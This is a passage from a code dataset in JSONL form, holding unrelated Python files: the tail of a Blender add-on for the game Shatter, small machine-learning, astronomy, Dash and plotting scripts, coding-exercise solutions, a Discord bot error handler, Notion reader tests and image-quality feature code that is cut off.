props.algorithm\n\t\t\t\n\t\t\t# Geometric options\n\t\t\tif (props.algorithm in [\"GeometricProgressionSet\", 
\"ArithmeticProgressionSet\"]):\n\t\t\t\tparams[\"geometric_exponent_minmax\"] = props.geometric_exponent_minmax\n\t\t\t\tparams[\"geometric_ratio\"] = props.geometric_ratio\n\t\t\t\tparams[\"geometric_require_unique\"] = props.geometric_require_unique\n\t\t\t\n\t\t\t# UpDownPath options\n\t\t\tif (props.algorithm in [\"UpAndDownPath\"]):\n\t\t\t\tparams[\"udpath_min\"] = props.udpath_minmax[0]\n\t\t\t\tparams[\"udpath_max\"] = props.udpath_minmax[1]\n\t\t\t\tparams[\"udpath_start\"] = props.udpath_start\n\t\t\t\tparams[\"udpath_step\"] = props.udpath_step\n\t\t\n\t\t# Room options\n\t\tif (props.type == \"BasicRoom\"):\n\t\t\tparams[\"room_length\"] = props.room_length\n\t\t\tparams[\"room_yoffset\"] = props.room_yoffset\n\t\t\tparams[\"room_door_part\"] = props.room_door_part\n\t\t\n\t\t# Archway\n\t\tif (props.type == \"ArchWay\"):\n\t\t\tparams[\"top_parts\"] = props.arch_top_parts\n\t\t\n\t\tautogen.generate(placer, params)\n\t\t\n\t\tplacer.selectAll()\n\t\t\n\t\treturn {'FINISHED'}\n\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n\n# Ignore the naming scheme for classes, please\n# Also WHY THE FUCK DO I HAVE TO DO THIS???\nclasses = (\n\tsh_SceneProperties,\n\tsh_EntityProperties,\n\tsh_SegmentPanel,\n\tsh_ItemPropertiesPanel,\n\tsh_AddonPreferences,\n\tsh_export,\n\tsh_export_gz,\n\tsh_export_auto,\n\tsh_export_binary,\n\tsh_export_test,\n\tsh_import,\n\tsh_import_gz,\n\tsh_shl_login,\n\tsh_auto_setup_segstrate,\n\tsh_static_segstrate,\n\tsh_rebake_meshes,\n\tSHATTER_MT_3DViewportMenuExtras,\n\tSHATTER_MT_3DViewportMenu,\n\tsh_CreateBox,\n\tsh_CreateObstacle,\n\tsh_CreateDecal,\n\tsh_CreatePowerup,\n\tsh_CreateWater,\n\tOpenShatterCreditsPage,\n\tOpenShatterPrivacyPage,\n\tAutogenProperties,\n\tAutogenPanel,\n\tRunRandomiseSeedAction,\n\tRunAutogenAction,\n\tlevel_pack_ui.ExportLevelPackage,\n\tRandomiseKeyphrase,\n)\n\nkeymaps = {\n\t\"D\": \"shatter.create_box\",\n\t\"F\": \"shatter.create_obstacle\",\n\t\"X\": \"shatter.create_decal\",\n\t\"C\": \"shatter.create_powerup\",\n\t\"V\": \"shatter.create_water\",\n\t\"R\": \"shatter.export_auto\",\n\t\"E\": \"shatter.export_test_server\",\n}\n\nkeymaps_registered = []\n\ndef register():\n\tfrom bpy.utils import register_class\n\t\n\tfor cls in classes:\n\t\tregister_class(cls)\n\t\n\tbpy.types.Scene.sh_properties = PointerProperty(type=sh_SceneProperties)\n\tbpy.types.Scene.shatter_autogen = PointerProperty(type=AutogenProperties)\n\tbpy.types.Object.sh_properties = PointerProperty(type=sh_EntityProperties)\n\t\n\t# Add the export operator to menu\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export)\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export_gz)\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export_auto)\n\tbpy.types.TOPBAR_MT_file_export.append(sh_draw_export_test)\n\t\n\t# Add import operators to menu\n\tbpy.types.TOPBAR_MT_file_import.append(sh_draw_import)\n\tbpy.types.TOPBAR_MT_file_import.append(sh_draw_import_gz)\n\t\n\t# Add Shatter menu in 3D viewport\n\tbpy.types.VIEW3D_MT_editor_menus.append(SHATTER_MT_3DViewportMenu_draw)\n\t\n\t# Register keymaps\n\twindow_manager = bpy.context.window_manager\n\t\n\tif (window_manager.keyconfigs.addon):\n\t\tfor a in keymaps:\n\t\t\tkeymap = window_manager.keyconfigs.addon.keymaps.new(name 
= '3D View', space_type = 'VIEW_3D')\n\t\t\tkeymap_item = keymap.keymap_items.new(keymaps[a], type = a, value = 'PRESS', shift = 1, alt = 1)\n\t\t\tkeymaps_registered.append((keymap, keymap_item))\n\t\n\t# Start server\n\tglobal g_process_test_server\n\t\n\tif (g_process_test_server and get_prefs().enable_quick_test_server):\n\t\ttry:\n\t\t\tg_process_test_server = quick_test.runServerProcess()\n\t\texcept Exception as e:\n\t\t\tprint(f\"*** Exception while starting quick test server ***\")\n\t\t\tprint(traceback.format_exc())\n\t\n\t# Check for updates\n\trun_updater()\n\t\n\t# Update user ID\n\tupdate_uid()\n\t\n\t# Check bad user info\n\tif (get_prefs().enable_bad_check):\n\t\timport bad_user as bad_user\n\t\tbad_user.bad_check(get_prefs().uid)\n\ndef unregister():\n\tfrom bpy.utils import unregister_class\n\t\n\t# Remove export operators\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export)\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export_gz)\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export_auto)\n\tbpy.types.TOPBAR_MT_file_export.remove(sh_draw_export_test)\n\t\n\t# Remove import operators\n\tbpy.types.TOPBAR_MT_file_import.remove(sh_draw_import)\n\tbpy.types.TOPBAR_MT_file_import.remove(sh_draw_import_gz)\n\t\n\t# Remove editor menu UI\n\tbpy.types.VIEW3D_MT_editor_menus.remove(SHATTER_MT_3DViewportMenu_draw)\n\t\n\t# Delete property types\n\tdel bpy.types.Scene.sh_properties\n\tdel bpy.types.Scene.shatter_autogen\n\tdel bpy.types.Object.sh_properties\n\t\n\t# Delete keymaps\n\tfor a, b in keymaps_registered:\n\t\ta.keymap_items.remove(b)\n\t\n\tkeymaps_registered.clear()\n\t\n\t# Unregister classes\n\tfor cls in reversed(classes):\n\t\t# Blender decided it would be a piece of shit today \n\t\ttry:\n\t\t\tunregister_class(cls)\n\t\texcept RuntimeError as e:\n\t\t\tprint(f\"Blender is being a little shit while unregistering class {cls}:\\n\\n{e}\")\n\t\n\t# Shutdown server\n\tglobal g_process_test_server\n\t\n\tif (g_process_test_server):\n\t\tg_process_test_server.terminate()\n","repo_name":"Shatter-Team/Shatter","sub_path":"addon/shatter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":59104,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"30266959135","text":"from sklearn import svm\n\nX = [[0, 0], [1, 1]]\ny = [0, 1]\nclf = svm.SVC()\nclf.fit(X, y)\n\nclf.predict([[2., 2.]])\n\nclf.support_vectors_\n\nclf.support_\n\nclf.n_support_\n","repo_name":"codingWithAndy/Thesis_Project","sub_path":"Additional Content/Exploring/ML Testing Code/boundary examples.py","file_name":"boundary examples.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"71122652390","text":"from astropy.io import fits\nimport numpy as np\nfrom astropy.table import join\n\nfields = ['goodsn','goodss','egs']#\n# for field in fields:\n# \thdu = fits.getdata('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_match_candels_van.fits',1)\n# \thuang = fits.getdata('/Users/lpr/Data/lirg_project/intake/huang_catalog/'+field+'_Huang_all.fits',1)\n# \thuang = huang[np.isin(huang['id'],hdu['id'])]\n# \tdata = join(hdu,huang,keys_left='id',keys_right='ID')\n# \tdata.write('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_Huangall_candels_van.fits',overwrite=True)\n# van_path = '/Users/lpr/Data/lirg_project/intake/3dhst/3dhst/'\n# van_ctg_name = {'goodsn':'goodsn','goodss':'goodss','egs':'aegis'}\n# for field in fields:\n# \thdu = fits.getdata('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_Huangall_candels_van.fits',1)\n# \tvan = fits.getdata(van_path+van_ctg_name[field]+'/'+van_ctg_name[field]+'_3dhst.v4.1_f160wf125w.fits',1)\n# \tvan = van[np.isin(van['id_van'],hdu['id_van'])]\n# \tdata = join(hdu,van,keys_left='id_van',keys_right='ID_van')\n# \tdata.write('/Users/lpr/Data/lirg_project/output/catalog_radec/'+field+'_Huangall_candels_van_params.fits',overwrite=True)\ndel_id = {'egs':[13011807,12101077,-1,13025385,13011815],'goodss':[2324,7748,16929,17215,15278,16731,16003,14856,14845,13663,13557,13121,12953,12814,12808,12467,11380,12237],'goodsn':[36821,31002,26981,11380,12237,19196,34172,42252,13027]}\nctg_path = '/Users/lpr/Data/lirg_project/output/catalog_radec/'\nfor field in fields:\n\tctg = fits.getdata(ctg_path+field+'_Huangall_candels_van_params_modifyz.fits',1)\n\tidx_list = []\n\tfor num in range(0,len(ctg)):\n\t\tidx = ctg[num]['id']\n\t\tseparation = ctg[num]['Separation_16_candels']\n\t\tz = ctg[num]['z_used']\n\t\tif idx not in del_id[field] and separation <= 1. and z <= 1.3 and z >= 0.8:\n\t\t\tidx_list.append(idx)\n\tidx_list = np.array(idx_list)\n\tcol = fits.Column(name='id',array=idx_list,format='K')\n\thdu = fits.BinTableHDU.from_columns([col])\n\thdu.writeto(ctg_path+field+'_id.fits',overwrite=True)","repo_name":"Lpr-katens/prcode","sub_path":"python/id_list.py","file_name":"id_list.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5076198587","text":"import dash\nfrom dash.dependencies import Input, Output\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport pandas_datareader as pdr\n\nmy_app = dash.Dash('my app')\n\nmy_app.layout = html.Div([\n html.H1('Hello PlotCon'),\n html.Label('Stock Tickers'),\n dcc.Input(\n value='AAPL',\n id='my-input'),\n dcc.Graph(\n id='my-graph',\n figure={\n 'data': [\n {'x': [1, 2], 'y': [3, 1]}\n ]\n }\n )\n])\n\n\n# update my-graph any time my-input changes\n@my_app.callback(\n Output(component_id='my-graph', component_property='figure'),\n [Input(component_id='my-input', component_property='value')])\ndef update_graph(stock_ticker):\n # stock_ticker = stock_ticker_input.value\n print(stock_ticker)\n df = pdr.get_data_yahoo(stock_ticker.strip('\\n'))\n figure = {\n 'data': [\n {\n 'x': df.index,\n 'y': df.Open\n }\n ]\n }\n # returned value is merged in the 'my-graph' component\n return figure\n\nmy_app.server.run(debug=True)\n","repo_name":"bosr/dash-basic-app","sub_path":"helloworld/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"16504720257","text":"from setuptools import setup, find_namespace_packages # type: ignore\n\n\ndef main() -> None:\n pkgs = find_namespace_packages('src')\n pkg = min(pkgs)\n return setup(\n name=pkg,\n zip_safe=False,\n packages=pkgs,\n package_dir={'': 'src'},\n package_data={pkg: ['py.typed']},\n\n install_requires=[\n # my version has some changes not in the upstream yet..\n 'instapaper @ git+https://github.com/karlicoss/instapaper.git',\n ],\n extras_require={\n 'testing': ['pytest'],\n 'linting': ['pytest', 'mypy', 'lxml'], # lxml for mypy coverage report\n 'optional': ['orjson', 'colorlog', 'enlighten'],\n },\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"karlicoss/instapexport","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"71"}
+{"seq_id":"26867450301","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[141]:\n\n\n# 2.요일별 교통량 \n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib import font_manager\n\ndf = pd.read_csv('../rawdata/totally_raw_data_delete_expression.csv', index_col='date')\ndf.index = df.index.astype(str)\ndf.index = pd.to_datetime(df.index, format='%Y-%m-%d')\ndf['week'] = df.index.to_series().dt.dayofweek\nweekday_names = \"월 화 수 목 금 토 일\".split(' ')\n\nfont_path = 'C:\\Windows\\Fonts\\malgun.ttf'\nfont = font_manager.FontProperties(fname=font_path).get_name()\nplt.rc('font', family=font, size=15)\n\nfig, ax = plt.subplots(figsize=(20, 6))\nplt.title('요일별 교통량', loc='center', pad=10)\nplt.rcParams['axes.unicode_minus'] = False\nplt.ylabel('요일별 교통량(합계)')\n\nax.set_xticklabels(weekday_names)\nax.set_xticks(range(0, len(weekday_names)))\n\ndata_for_week = {\n 0: [],\n 1: [],\n 2: [],\n 3: [],\n 4: [],\n 5: [],\n 6: [],\n}\nfor col_name, item in df['week'].iteritems():\n data_for_week[item].append(df['sm_tot_t'].get(col_name))\n\nresult_df_for_week = []\nfor i in range(data_for_week.__len__()):\n result_df_for_week.append(data_for_week[i])\ndf_for_week = pd.DataFrame(result_df_for_week)\n\nax.plot(df_for_week, label='요일별 교통량(합계)')\n\n# plt.show()\nplt.savefig('../image/2_요일별교통량.png', dpi=300)\n","repo_name":"bourbonkk/StatisticDataAnalysis","sub_path":"visualization/2_요일별 교통량.py","file_name":"2_요일별 교통량.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40439032824","text":"# '''给定两个数组,编写一个函数来计算它们的交集。\n#\n# 示例 1:\n#\n# 输入: nums1 = [1,2,2,1], nums2 = [2,2]\n# 输出: [2]\n# 示例 2:\n#\n# 输入: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\n# 输出: [9,4]\n# 说明:\n#\n# 输出结果中的每个元素一定是唯一的。\n# 我们可以不考虑输出结果的顺序。\n# '''\n#\n#\n# class Solution:\n# def intersection(self, nums1, nums2):\n# \"\"\"\n# :type nums1: List[int]\n# :type nums2: List[int]\n# :rtype: List[int]\n#\n#\n# \"\"\"\n#\n# i = 0\n# j = 0\n# result = []\n# while i < len(nums1) and j < len(nums2):\n# if (nums1[i] > nums2[j]):\n# # result.append(group2[j])\n# j = j + 1\n# elif (nums1[i] < nums2[j]):\n# # result.append(group1[i])\n# i = i + 1\n# elif (nums1[i] == nums2[j]):\n# result.append(nums1[i])\n# i = i + 1\n# j = j + 1\n# result=list(set(result))\n# return result\n#\n# def selectSoft(nums1, nums2):\n# for i in range(0, len(nums1) - 1):\n# index = i\n# for j in range(i + 1, len(nums1)):\n# if nums1[index] > nums1[j]:\n# index = j\n# nums1[i], nums1[index] = nums1[index], nums1[i]\n#\n# for i in range(0, len(nums2) - 1):\n# index = i\n# for j in range(i + 1, len(nums2)):\n# if nums2[index] > nums2[j]:\n# index = j\n# nums2[i], nums2[index] = nums2[index], nums2[i]\n# return nums1, nums2\n#\n#\n# if __name__ == '__main__':\n# group1 = [1, 2, 2, 1]\n# group2 = [2, 2]\n# a = Solution()\n# p = a.intersection(group1, group2)\n# print(p)\nclass Solution:\n def intersection(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n return list(set(nums1) & set(nums2))\n\n\nif __name__ == '__main__':\n a = Solution()\n n1 = [4, 9, 5]\n n2 = [9, 4, 9, 8, 4]\n p=a.intersection(n1,n2)\n print(p)","repo_name":"coquelin77/PyProject","sub_path":"leetcode/349两个数组的交集.py","file_name":"349两个数组的交集.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34660425845","text":"from itertools import groupby\nfrom pprint import pprint\n\ndef count_words(text: str, words: set) -> int:\n t_text = text.lower()\n cnt = 0\n for w in words:\n idx = t_text.find(w)\n if idx == -1: continue\n cnt += 1\n t_text.replace(w, '')\n return cnt\n\n\ndef long_repeat_old(line):\n if len(line) == 0: return 0\n t_line = line\n tokens = []\n while len(t_line) > 0:\n need_to_sep = False\n for i in range(len(t_line)):\n if t_line[i] != t_line[0]:\n need_to_sep = True\n break\n if not need_to_sep:\n tokens.append(t_line)\n break\n tokens.append(t_line[:i])\n t_line = t_line[i:]\n result = max([len(tt) for tt in tokens])\n return result\n\n\ndef long_repeat(line):\n if len(line) == 0: return 0\n ch = line[0]\n max_cnt = 1\n current = 1\n for l in line[1:]:\n if l == ch:\n current += 1\n else:\n max_cnt = max(max_cnt, current)\n current = 1\n ch = l\n max_cnt = max(max_cnt, current)\n\n return max_cnt\n\n\ndef two_teams(sailors):\n #replace this for solution\n print('entry')\n result =[\n sorted([k for k in sailors if sailors[k] < 20 or sailors[k] > 40]),\n sorted([k for k in sailors if sailors[k] >= 20 and sailors[k] <= 40])\n ]\n pprint(result)\n return result\n\ndef house(plan):\n p = [list(__) for __ in plan.split()]\n max_r, max_c = 0, 0\n min_r, min_c = 11, 11\n no_hash = True\n # pprint(p)\n for row in range(len(p)):\n if '#' in p[row]:\n max_r, min_r = max(max_r, row), min(min_r, row)\n no_hash = False\n if no_hash: return 0\n\n for col in range(len(p[0])):\n for row in range(len(p)):\n if '#' == p[row][col]:\n max_c, min_c = max(max_c, col), min(min_c, col)\n break\n area = (max_r - min_r + 1) * (max_c - min_c + 1)\n return area\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(house('''\n0000000\n##00##0\n######0\n##00##0\n#0000#0\n'''))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert house('''\n0000000\n##00##0\n######0\n##00##0\n#0000#0\n''') == 24\n\n assert house('''0000000000\n#000##000#\n##########\n##000000##\n0000000000\n''') == 30\n\n assert house('''0000\n0000\n#000\n''') == 1\n\n assert house('''0000\n0000\n''') == 0\n\n assert house('''\n0##0\n0000\n#00#\n''') == 12\n\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n\n","repo_name":"hnjang/turbo-octo-couscous","sub_path":"checkio/ground-house/ground-house.py","file_name":"ground-house.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29072631449","text":"\"\"\"\nError handler\n\n\"\"\"\nimport sys\nimport discord\nimport traceback\nfrom datetime import datetime\n\nfrom discord.ext import commands\nfrom discord import app_commands\nfrom typing import Optional, Iterable\n\nfrom .. import config\nfrom .utils import errors\nfrom ..resources import EMOJIS\n\n\nclass ErrorHandler(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n bot.tree.error(coro=self.__dispatch_to_app_command_handler)\n\n async def __dispatch_to_app_command_handler(\n self,\n interaction: discord.Interaction,\n error: app_commands.AppCommandError\n ) -> None:\n self.bot.dispatch(\"app_command_error\", interaction, error)\n\n @commands.Cog.listener(\"on_app_command_error\")\n async def get_app_command_error(\n self,\n interaction: discord.Interaction,\n error: app_commands.AppCommandError\n ) -> None:\n \"\"\"\n Override default error handler to send ephemeral messages\n\n Parameters\n ----------\n interaction: discord.Interaction\n error: app_commands.AppCommandError\n\n \"\"\"\n cmd = interaction.command.name\n\n if isinstance(error, errors.MushError):\n info = {'msg': error.msg, 'see_also': error.see_also}\n embed = self.format_error(**info)\n elif isinstance(error.__cause__, discord.Forbidden):\n # CommandInvokeError from e\n embed = self.format_error(errors.MissingPermissions.default_msg)\n else:\n # generic message\n embed = self.format_error(errors.MushError.default_msg)\n print(f'Ignoring exception in command `{cmd}`:', file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n\n # determine coro for sending\n error_args = {\n 'embed': embed,\n 'ephemeral': True\n }\n\n if interaction.response.is_done():\n try: # try to get orig message\n orig_msg = await interaction.original_response()\n except discord.NotFound:\n orig_msg = None\n\n if orig_msg and not orig_msg.flags.ephemeral:\n await orig_msg.delete() # delete if not ephemeral\n coro = interaction.followup.send\n else:\n coro = interaction.edit_original_response\n error_args.pop('ephemeral')\n else:\n coro = interaction.response.send_message\n\n await coro(**error_args)\n\n @commands.Cog.listener()\n async def on_command_error(\n self,\n ctx: commands.Context,\n error: commands.CommandError\n ) -> None:\n \"\"\"\n Override default command error\n\n Parameters\n ----------\n ctx: commands.Context\n error: commands.CommandError\n\n \"\"\"\n if not ctx.command: # not command\n return\n\n cmd = ctx.command.qualified_name\n\n if isinstance(error, commands.MissingPermissions):\n embed = self.format_error(str(error))\n elif isinstance(error, errors.MushError):\n info = {'msg': error.msg, 'see_also': error.see_also}\n embed = self.format_error(**info)\n else:\n embed = self.format_error(errors.MushError.default_msg)\n print(f'Ignoring exception in command `{cmd}`:', file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__,\n file=sys.stderr)\n\n try: # try to cleanup the original message\n await ctx.message.delete(delay=10)\n except (discord.Forbidden, discord.NotFound, discord.HTTPException):\n pass\n\n await ctx.send(embed=embed, delete_after=10)\n\n def format_error(\n self,\n msg: Optional[str] = None,\n see_also: Optional[Iterable[str]] = None,\n ) -> discord.Embed:\n \"\"\"\n Format error into an embed\n\n Parameters\n ----------\n msg: Optional[str]\n the message to send in embed\n see_also: Optional[Iterable[str]]\n list of fully qualified command names to reference\n\n Returns\n 
-------\n discord.Embed\n the embed error\n\n \"\"\"\n # defaults\n msg = msg or f'{config.core.bot_name} failed *cry*'\n msg += '\\n\\u200b'\n\n # send error\n embed = discord.Embed(description=msg, color=config.core.embed_color)\n embed.set_author(name='Error',\n icon_url=self.bot.user.display_avatar.url)\n embed.set_thumbnail(url=self.bot.get_emoji(EMOJIS['mushshock'].id).url)\n\n if see_also:\n fmt = [f'`/{cmd}`' for cmd in see_also]\n embed.add_field(name='See also', value=', '.join(fmt))\n\n return embed\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(ErrorHandler(bot))\n","repo_name":"kerochama/mushmom","sub_path":"mushmom/cogs/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6528569848","text":"import unittest\nfrom notion_entry_details import NotionEntryDetails\nfrom notion_reader import NotionReader\nimport os\n\nclass NotionReaderTests(unittest.TestCase):\n def test_filter_status(self):\n token = os.environ.get('NOTION_TOKEN')\n notion_reader = NotionReader(token)\n entries = notion_reader.get_entries_to_update(\"https://www.notion.so/Filter-Status-45b97981608f4ce6a36091172b962439\")\n self.assertEqual(1,len(entries))\n \n def test_download_image(self):\n self.assertEqual(1,1)\n\n def test_markdown(self):\n expected = NotionEntryDetails(\n \"93812fac65a14d1eb9033ece651ef2b3\",\n \"title\",\n [\"fuga\"],\n \"# h1\\n\\n## h2\\n\\n### h3\\n\\n- bullet\\n\\n1. one\\n\\n**bold** text\\n\\n[facebook](https://www.facebook.com/) link\\n\\n\",\n []\n )\n token = os.environ.get('NOTION_TOKEN')\n notion_reader = NotionReader(token)\n entries = notion_reader.get_entries_to_update(\"https://www.notion.so/Markdown-70e076df8367476b820f9c5d5b9d2c84\")\n self.assertEqual(expected.__dict__, entries[0].__dict__)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"rmitsubayashi/notion_blog_to_github_page","sub_path":"test_notion_reader.py","file_name":"test_notion_reader.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"38566117525","text":"from datetime import date, datetime\n\ndef data():\n hoje = date.today()\n dia = hoje.day\n mes = hoje.month\n ano = hoje.year\n \n return (str(dia)+\"/\"+str(mes)+\"/\"+str(ano))\n'''\nmostra a data, dia, mês e ano\n'''\n\ndef hora():\n\n agora = datetime.now()\n horas=agora.hour\n minutos=agora.minute\n segundos=agora.second\n\n return(str(horas)+\":\"+str(minutos)+\":\"+str(segundos))\n'''\nmostra a horas, minutos, e segundos\n'''","repo_name":"Josenildosouza6/proj-embarque","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38186999622","text":"__author__ = 'id301'\n\n\ndef test_api(setup_task2):\n \"\"\"Отправка запроса'GET https://www.lenvendo.ru/api/js-test-task/?search=Alcatel&sort_field=name'\n Проверка:\n 1. Все поля \"name\" в ответе на запрос содержат значение \"Alcatel\"\n 2. Все элементы в ответе отсортированы по полю 'name' в алфавитном порядке\"\"\"\n products = setup_task2.get_products(search='Alcatel', sort_field='name')\n for product in products:\n assert product.name.count('Alcatel') > 0, f'Поле name не содержит значение \"Alcatel\" в элементе: {product}'\n names = [x.name for x in products]\n assert names == sorted(names), 'Элементы в ответе не отсортированы по полю name в алфавитном порядке'","repo_name":"id301/automationqa_task","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17109558486","text":"foods = [\"apples\", \"bananas\", \"cherries\", \"donuts\"]\namounts = [11, 22, 33, 44]\n\ndef myfruitCounter(fruit):\n i = foods.index(fruit)\n print('There are {} {}.'.format(amounts[i],fruit))\n\ndef classFruitCounter(fruit):\n # for i, food in enumerate(foods):\n # if food == fruit:\n # print('There are {} {}.'.format(amounts[i], fruit))\n # break\n for food, amount in zip(foods, amounts):\n if food == fruit:\n print('There are {} {}.'.format(amount, fruit))\n break\n\nif __name__ == \"__main__\":\n myfruitCounter(\"apples\")\n classFruitCounter(\"donuts\")","repo_name":"kylemitra/blood-calculator","sub_path":"lecture5Notes.py","file_name":"lecture5Notes.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10704361826","text":"from student import *\r\n\r\ndef main():\r\n\t\r\n\tmyList = []\r\n\tn = eval(input(\"How many people: \"))\r\n\tfor i in range(n):\r\n\t\tmyList.append(SchoolMember(\"Nick\",4))\r\n\tfor i in range(n):\r\n\t\tmyList.append(Student(\"Patrick\",3, 99))\r\n\tfor i in range(n):\r\n\t\tmyList.append(Teacher(\"Jonas\",8,95000))\r\n\tfor i in range(n):\r\n\t\tmyList.append(Undergrad(\"Melvin\",8,93,35000))\r\n\r\n\tfor person in myList:\r\n\t\tperson.printMember()\r\n\tStudent.printMembers()\r\n\tTeacher.printMembers()\r\n\tUndergrad.printMembers()\r\n\r\n\tinput()\r\n\r\nmain()\r\n","repo_name":"nicholaswang45/Object-Orientated-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70839792221","text":"import cv2\r\nimport math\r\nimport numpy as np\r\nimport os\r\nfrom scipy.ndimage.filters import convolve\r\nfrom scipy.signal import convolve2d\r\nfrom scipy.special import gamma\r\nfrom scipy.ndimage import correlate\r\nimport scipy.sparse.linalg as sla\r\nimport scipy.io\r\nfrom scipy.stats import exponweib\r\nfrom scipy.optimize import fmin\r\nimport time\r\nfrom matlab_resize import MATLABLikeResize\r\nfrom tqdm import tqdm\r\n\r\ndef MyPCA(sampleData, reservedRatio):\r\n principleVectors = []\r\n meanOfSampleData = np.mean(sampleData, axis=1, keepdims=True)\r\n meanMatrix = np.tile(meanOfSampleData,(1,sampleData.shape[1]))\r\n centerlizedData = sampleData - meanMatrix\r\n\r\n covarianceMatrix = np.matmul(centerlizedData.T, centerlizedData)\r\n subSpaceDim = min(sampleData.shape)\r\n reservedPCs = math.floor(subSpaceDim*reservedRatio)\r\n d, tmpEigVectors = sla.eigs(covarianceMatrix,subSpaceDim)\r\n\r\n eigVectors = np.matmul(centerlizedData, tmpEigVectors[:,0:reservedPCs])\r\n for pcIndex in range(reservedPCs):\r\n tmpVector = eigVectors[:, pcIndex]\r\n tmpVector = tmpVector / np.linalg.norm(tmpVector,2)\r\n principleVectors.append(tmpVector)\r\n\r\n principleVectors = np.array(principleVectors).T\r\n projectionOfTrainingData = np.matmul(principleVectors.T, centerlizedData)\r\n\r\n return principleVectors, meanOfSampleData, projectionOfTrainingData\r\n\r\ndef fitweibull(x):\r\n def optfun(theta):\r\n return -np.sum(np.log(exponweib.pdf(x, 1, theta[0], scale = theta[1], loc = 0)))\r\n logx = np.log(x)\r\n shape = 1.2 / np.std(logx)\r\n scale = np.exp(np.mean(logx) + (0.572 / shape))\r\n return fmin(optfun, [shape, scale], xtol = 0.01, ftol = 0.01, disp = 0)\r\n\r\ndef estimate_aggd_param(block):\r\n \"\"\"Estimate AGGD (Asymmetric Generalized Gaussian Distribution) parameters.\r\n\r\n Args:\r\n block (ndarray): 2D Image block.\r\n\r\n Returns:\r\n tuple: alpha (float), beta_l (float) and beta_r (float) for the AGGD\r\n distribution (Estimating the parames in Equation 7 in the paper).\r\n \"\"\"\r\n block = block.flatten()\r\n gam = np.arange(0.2, 10.001, 0.001) # len = 9801\r\n gam_reciprocal = np.reciprocal(gam)\r\n r_gam = np.square(gamma(gam_reciprocal * 2)) / (gamma(gam_reciprocal) * gamma(gam_reciprocal * 3))\r\n\r\n left_std = np.sqrt(np.mean(block[block < 0]**2))\r\n right_std = np.sqrt(np.mean(block[block > 0]**2))\r\n gammahat = left_std / right_std\r\n rhat = (np.mean(np.abs(block)))**2 / np.mean(block**2)\r\n rhatnorm = (rhat * (gammahat**3 + 1) * (gammahat + 1)) / ((gammahat**2 + 1)**2)\r\n array_position = np.argmin((r_gam - rhatnorm)**2)\r\n\r\n alpha = gam[array_position]\r\n beta_l = left_std * np.sqrt(gamma(1 / alpha) / gamma(3 / alpha))\r\n beta_r = right_std * np.sqrt(gamma(1 / alpha) / gamma(3 / alpha))\r\n return (alpha, beta_l, beta_r)\r\n\r\ndef compute_mean(feature, block_posi):\r\n data = feature[block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n return np.mean(data)\r\n\r\ndef compute_feature(feature_list, block_posi):\r\n \"\"\"Compute features.\r\n\r\n 